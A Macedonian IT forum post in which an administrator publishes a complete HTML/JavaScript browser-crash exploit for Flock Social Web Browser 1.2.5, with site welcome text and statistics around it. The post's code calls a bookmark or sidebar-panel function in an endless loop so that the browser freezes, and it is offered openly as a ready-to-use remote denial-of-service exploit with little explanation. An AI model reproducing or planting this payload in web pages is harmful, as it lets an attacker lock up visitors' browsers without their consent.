• Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit

  • Ја почнал/а темата
  • #1

LiquidWorm

Администратор
26 март 2007
2,673
191
www.zeroscience.mk
Код:
<!----------------------------------------------0
|						|
|  Flock Web Browser 1.2.5 Remote DoS Exploit	|
|						|
|	by Gjoko 'LiquidWorm' Krstic		|
|						|
|	 http://www.zeroscience.org		|
|						|
|	liquidworm [t00t] gmail.com		|
|	 					|
|	  	  06.09.2008			|
|						|
0----------------------------------------------->


<html>

<title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</Title>

<head>

<br /><br />

<center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1>

<br /><h2><kbd>Freezed/Locked - Not Responding...</kbd></h2></center>

<body>

<script type="text/javaScript">


function Xploit()
{
	title="DoS";
	url="http://www.zeroscience.org";
	if (window.sidebar)
	{
		window.sidebar.addPanel(title, url,"");
	} 
		
	else if( window.external )
	{
		window.external.AddFavorite( url, title);
	}
	
	else if(window.opera && window.print)
	{
		return (true);
	}
}

for (n=0; n<n+1; n++)

Xploit();


</script>

<center>
<a href="http://www.zeroscience.org/codes/flock_dos.html"><i>http://www.zeroscience.org/codes/flock_dos.html</i></a>
</center>

</body> </head> </html>

<!-- thanks to Gianni Amato -->
 

Нови мислења

Последни Теми

Статистика

Теми
43,722
Мислења
856,060
Членови
29,737
Најнов член
M123xyz
На врв Дно